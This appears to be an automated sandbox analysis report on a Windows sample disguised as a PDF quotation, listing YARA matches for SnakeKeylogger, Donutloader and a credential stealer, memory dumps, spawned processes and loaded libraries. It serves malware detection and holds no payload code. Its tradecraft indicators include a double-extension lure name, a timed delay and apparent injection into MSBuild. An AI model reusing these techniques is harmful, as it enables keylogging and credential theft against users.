Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Code function: 0_2_00007FFD9BC1CA09 NtUnmapViewOfSection,

0_2_00007FFD9BC1CA09

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_000001375093FF56	0_2_000001375093FF56
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_000001375093FB7A	0_2_000001375093FB7A
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_000001375093EC9E	0_2_000001375093EC9E
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_0000013750940E3A	0_2_0000013750940E3A
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_0000013750940386	0_2_0000013750940386
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC02529	0_2_00007FFD9BC02529
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC0FCDD	0_2_00007FFD9BC0FCDD
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC0068D	0_2_00007FFD9BC0068D

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static PE information: No import functions for PE file found

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000000.1651967542.0000013735DFD000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameGyica.exe@ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAdelina.exe0 vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2346139310.0000013750B90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNscdjghctwr.dll" vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAdelina.exe0 vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2347202995.0000013750D40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.000001373817B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAdelina.exe0 vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Binary or memory string: OriginalFilenameGyica.exe@ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, TcpPacket.cs	Suspicious method names: .TcpPacket.DecodePayload
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, MacFrame.cs	Suspicious method names: .MacFrame.GetAvailablePayloadLength
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, InternetLinkLayerPacket.cs	Suspicious method names: .InternetLinkLayerPacket.GetInnerPayload

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@13/0@6/5

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Virustotal: Detection: 21%

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

File read: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe "C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe"
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Section loaded: schannel.dll	Jump to behavior
